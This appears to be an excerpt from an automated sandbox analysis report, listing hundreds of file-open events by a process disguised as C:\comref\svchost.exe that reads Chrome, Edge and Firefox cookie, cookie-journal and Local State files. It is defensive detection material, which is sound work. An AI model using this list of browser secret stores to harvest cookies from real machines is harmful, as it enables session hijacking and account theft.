Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
